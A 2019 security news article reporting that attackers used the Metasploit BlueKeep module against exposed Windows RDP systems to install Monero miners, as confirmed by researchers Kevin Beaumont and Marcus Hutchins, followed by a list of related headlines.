5 November 2019

Hackers using BlueKeep remote desktop security flaw to install cruptocurrency miners on vulnerable PCs

Hackers using BlueKeep remote desktop security flaw to install cruptocurrency miners on vulnerable PCs

Security researchers have detected the first mass-hacking campaign using the BlueKeep flaw in Windows operating system to infect computers with a cryptocurrency miner. The good news is that the exploit is not being leveraged as a self-propagading worm, as Microsoft has cautioned back in May when it issued a patch urging users to update their systems, but rather attacks appear to be an opportunistic endeavor in pursuit of monetary gain.

detected a spike in attacks exploiting the BlueKeep vulnerability, but rather than taking remote control of the machines, the attackers were causing them to crush. According to Beaumont, the attacks began on October 23.

Beaumont’s discovery was confirmed by security expert Marcus "MalwareTech" Hutchins. According to researcher’s blog post, the attackers were using a demo BlueKeep exploit released by Metasploit team back in September to compromise Windows systems and install a Monero cryptocurrency miner.

"Finally, we confirm this segment [in crash dump] points to executable shellcode. At this point, we can assert valid BlueKeep exploit attempts in the wild, with shellcode that even matches that of the shellcode in the BlueKeep Metasploit module!" Hutchins said.

The analyzed exploit contained encoded PowerShell commands as the initial payload, which downloaded the final malicious executable binary from a remote attacker-controlled server and executed it on the targeted systems.

Hutchins also confirmed that this hacking operation doesn’t include self-spreading, worm-like capabilities, instead, it appears that the attackers are scanning the internet in search of vulnerable Windows with exposed RDP ports, deploy the BlueKeep exploit and then install a cryptocurrency miner.


Back to the list

Latest Posts

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

New group of hackers targets businesses with backdoor malware in financially-motivated attacks

The TA2101 gang used malicious emails to infect organizations in Germany, Italy, and the United States with backdoor, banking Trojan, or ransomware malware.
15 November 2019
APT33 hackers set up their own VPN network to thwart tracking

APT33 hackers set up their own VPN network to thwart tracking

APT33 used its private VPN network for reconnaissance of networks that are relevant to the supply chain of the oil industry.
14 November 2019
New unusual ransomware is hunting for enterprise servers

New unusual ransomware is hunting for enterprise servers

New PureLocker ransomware seems to have links to the malware provider used by Cobalt and FIN6 hacking groups.
13 November 2019
Featured vulnerabilities
Debian update for postgresql-common
Low Patched | 15 Nov, 2019
Cross-site scripting in Pimcore
Low Patched | 15 Nov, 2019
Multiple vulnerabilities in Pimcore
Medium Patched | 15 Nov, 2019